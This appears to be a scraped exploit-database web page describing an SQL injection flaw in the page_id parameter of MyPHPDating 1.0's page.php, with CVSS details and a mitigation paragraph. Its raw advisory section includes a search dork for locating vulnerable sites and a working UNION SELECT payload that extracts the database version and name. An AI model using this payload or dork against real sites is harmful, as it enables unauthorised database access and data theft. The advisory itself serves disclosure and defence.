Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
MyPHPDating 1.0 SQL Injection Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
MyPHPDating
by:
ITTIHACK
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MyPHPDating
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2012

MyPHPDating 1.0 SQL Injection Vulnerability

The vulnerability exists in the 'page.php' file of MyPHPDating version 1.0. An attacker can exploit this vulnerability by injecting SQL code through the 'page_id' parameter. This can lead to unauthorized access, data leakage, and potential remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, implementing parameterized queries or prepared statements can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

MyPHPDating 1.0 SQL Injection Vulnerability  \
==============================================\__________________________
       Software : MyPHPDating version 1.0                                \
       Date     : 1/1/2012                                           	  \
       Vendor   : http://www.phponlinedatingsoftware.com/                  \
       Demo     : http://www.phponlinedatingsoftware.com/demo.htm           \
	   Get App. : http://www.phponlinedatingsoftware.com/order.htm           \
       Price    : $149.00	                                                  \
       Dork     : "Powered by MyPHPDating"	                                   \
       Author   : ITTIHACK                                                      \
       Home     : http://ittihack.com                                            \                
==================================================================================                
                                                                                  |_______________________________________|
Vulnerable file : page.php                                                                                                |
Exploit         : http://localhost/[path]/page.php?page_id=[SQL]                                                          |
                  http://localhost/[path]/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--    |
==========================================================================================================================|

 
 Greatz to: Reinie

Navigation

Suggest Exploit

Services By CQR